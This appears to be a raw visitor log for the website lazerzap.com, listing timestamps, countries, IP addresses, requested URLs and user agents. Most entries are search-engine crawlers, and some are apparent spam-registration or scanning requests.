173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 No Referrer Jul 07 - 21:40 United States 54.36.148.115 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 07 - 22:19 China 180.76.15.6 http://www.lazerzap.com/index.php/component/users/ts_files/ts_files/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 07 - 22:20 China 220.181.108.122 http://www.lazerzap.com/index.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 07 - 22:20 China 220.181.108.185 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 07 - 22:33 China 180.76.15.31 http://www.lazerzap.com/index.php/component/users/ts_files/scroll.js www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 07 - 22:48 United States 35.164.84.48 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36 No Referrer Jul 07 - 23:22 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 07 - 23:22 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 07 - 00:55 172.87.223.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com/ Jul 07 - 00:55 172.87.223.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com Jul 07 - 01:38 China 42.236.99.242 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider http://lazerzap.com/ Jul 07 - 01:41 Russian Federation 93.158.161.29 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 07 - 01:41 Russian Federation 5.255.250.160 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 07 - 02:00 United States 148.64.56.65 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; GrapeshotCrawler/2.0; +http://www.grapeshot.co.uk/crawler.php) No Referrer Jul 07 - 02:18 United States 40.77.167.159 http://lazerzap.com/index.php?m=wap lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 07 - 02:26 Russian Federation 46.161.9.56 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.1) Gecko/20100101 Firefox/40.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 07 - 02:26 Russian Federation 46.161.9.56 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.1) Gecko/20100101 Firefox/40.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 07 - 02:26 Russian Federation 46.161.9.56 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.1) Gecko/20100101 Firefox/40.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 07 - 02:26 Russian Federation 46.161.9.56 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.1) Gecko/20100101 Firefox/40.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 07 - 02:26 Russian Federation 46.161.9.56 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.1) Gecko/20100101 Firefox/40.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 07 - 02:26 Russian Federation 46.161.9.56 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.1) Gecko/20100101 Firefox/40.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 07 - 02:44 China 180.76.15.149 http://www.lazerzap.com/?q=login.destroy.session&r=0.01231231230 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 07 - 02:50 United States 54.36.148.144 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 07 - 03:16 United States 64.62.252.163 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown The Knowledge AI No Referrer Jul 07 - 04:15 Mexico 189.202.33.76 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 No Referrer Jul 07 - 05:36 United States 54.36.148.11 http://lazerzap.com/index.php?user/create_form/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 07 - 05:37 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 07 - 05:47 China 180.76.15.25 http://www.lazerzap.com/index.php/+/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 07 - 05:53 United States 54.36.149.55 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 07 - 07:32 Ukraine 82.193.109.241 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; Win64; rv:43.1) Gecko/20100101 Firefox/43.1 http://lazerzap.com/ Jul 07 - 07:38 United States 54.36.148.128 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 07 - 08:07 United States 157.55.39.180 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 07 - 08:16 United States 157.55.39.180 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 07 - 08:50 United States 40.77.167.91 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 07 - 09:15 China 123.207.95.146 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Internet Explorer 6 Mozilla/4.0 (compatible; MSIE 6.1; Windows NT) No Referrer Jul 08 - 09:32 China 180.76.15.30 http://www.lazerzap.com/index.php/mber/ts_files/updatetopsites.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 08 - 10:09 Ukraine 79.110.17.2 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 YaBrowser/17.10.0.2017 Yowser/2.5 Safari/537.36 http://lazerzap.com/ Jul 08 - 10:12 Romania 109.102.111.84 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.6.0_04 No Referrer Jul 08 - 10:12 Romania 109.102.111.84 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.6.0_04 No Referrer Jul 08 - 10:15 China 180.76.15.31 http://www.lazerzap.com/index.php/component/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 08 - 10:15 Russian Federation 37.113.47.86 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Firefox Mozilla/5.0 (Windows NT 5.0; rv:44.0) Gecko/20100101 Firefox/44.0 http://lazerzap.com/ Jul 08 - 10:26 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 10:57 China 180.76.15.156 http://www.lazerzap.com/index.php/component/ts_files/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 08 - 11:14 China 111.206.36.19 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=browncw8 Jul 08 - 11:18 Ukraine 77.120.176.171 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/3.0 (compatible; Indy Library) No Referrer Jul 08 - 11:18 Ukraine 77.120.176.171 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/3.0 (compatible; Indy Library) No Referrer Jul 08 - 11:30 Romania 109.102.111.84 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.6.0_04 No Referrer Jul 08 - 11:30 Romania 109.102.111.84 http://www.lazerzap.com/index.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.6.0_04 No Referrer Jul 08 - 11:37 China 14.215.176.11 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=can2wz Jul 08 - 12:13 United States 54.36.148.213 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 12:17 Russian Federation 178.62.99.178 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 No Referrer Jul 08 - 12:45 United States 54.36.148.102 http://lazerzap.com/index.php/mber/ts_files/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 12:47 Russian Federation 46.161.9.56 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47 http://lazerzap.com/cgi-bin/wiki.pl?action=like;id=BBS Jul 08 - 13:34 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 13:35 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 14:41 United States 34.228.142.116 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) No Referrer Jul 08 - 14:42 China 180.76.15.26 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 08 - 15:14 United States 40.77.167.159 http://lazerzap.com/index.php?m=wap lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 08 - 16:02 United States 54.36.148.35 http://lazerzap.com/index.php/component/users/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 16:21 United States 54.36.148.218 http://lazerzap.com/index.php/+/ts_files/ts_files/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 17:11 United States 184.94.240.92 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 No Referrer Jul 08 - 17:28 United States 54.36.148.241 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 18:16 Israel 109.186.85.2 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 No Referrer Jul 08 - 19:05 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 19:05 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 19:16 United States 54.36.148.187 http://lazerzap.com/index.php/component/users/ts_files/ts_files/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 19:41 Philippines 110.54.154.23 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 No Referrer Jul 08 - 19:49 Russian Federation 46.161.9.71 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; Win64; rv:38.0) Gecko/20100101 Firefox/38.0 http://lazerzap.com/ Jul 08 - 21:04 Ukraine 79.110.17.2 http://lazerzap.com/index.php/component/users/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox Mozilla/5.0 (Windows NT 5.1; rv:44.0) Gecko/20100101 Firefox/44.0 http://lazerzap.com/index.php/component/users/ Jul 08 - 21:04 Ukraine 79.110.17.2 http://lazerzap.com/index.php/component/users/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox Mozilla/5.0 (Windows NT 5.1; rv:44.0) Gecko/20100101 Firefox/44.0 http://lazerzap.com/index.php/component/users/updatetopsites.php Jul 08 - 21:04 Ukraine 79.110.17.2 http://lazerzap.com/index.php/component/users/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox Mozilla/5.0 (Windows NT 5.1; rv:44.0) Gecko/20100101 Firefox/44.0 http://lazerzap.com/index.php/component/users/updatetopsites.php Jul 08 - 21:18 United States 66.249.66.79 http://lazerzap.com/index.php?page=join lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 21:29 United States 40.77.167.91 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 08 - 22:04 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 22:18 United States 54.36.149.44 http://www.lazerzap.com/index.php/component/users/ts_files/ts_files/scroll.js www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 22:40 China 14.215.176.17 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=swungjk5 Jul 08 - 22:40 Russian Federation 46.161.9.56 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 8.1; WOW64; rv:32.1) Gecko/20100101 Firefox/32.1 https://lazerzap.com/ Jul 08 - 22:47 United States 54.36.148.211 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 22:48 United States 157.55.39.180 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 08 - 22:57 United States 157.55.39.180 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 08 - 23:30 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 23:36 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 01:07 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 01:22 Russian Federation 46.161.9.50 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 http://lazerzap.com/ Jul 08 - 01:29 China 180.76.15.142 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 08 - 01:38 United States 66.249.66.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 01:59 United States 54.210.226.227 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) No Referrer Jul 08 - 02:14 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 02:43 Romania 109.102.111.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.6.0_04 No Referrer Jul 08 - 02:43 Romania 109.102.111.64 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.6.0_04 No Referrer Jul 08 - 02:44 United States 66.249.66.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 04:05 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 04:10 Russian Federation 141.8.143.132 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 08 - 04:14 China 183.198.12.192 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.3084.400 QQBrowser/9.6.11346.400 http://lazerzap.com Jul 08 - 04:14 United States 54.36.148.166 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 04:26 United States 107.23.144.200 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Linux rest-client/2.0.0.rc2 (linux-gnu x86_64) ruby/2.1.3p242 No Referrer Jul 08 - 04:27 United States 107.23.144.200 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] 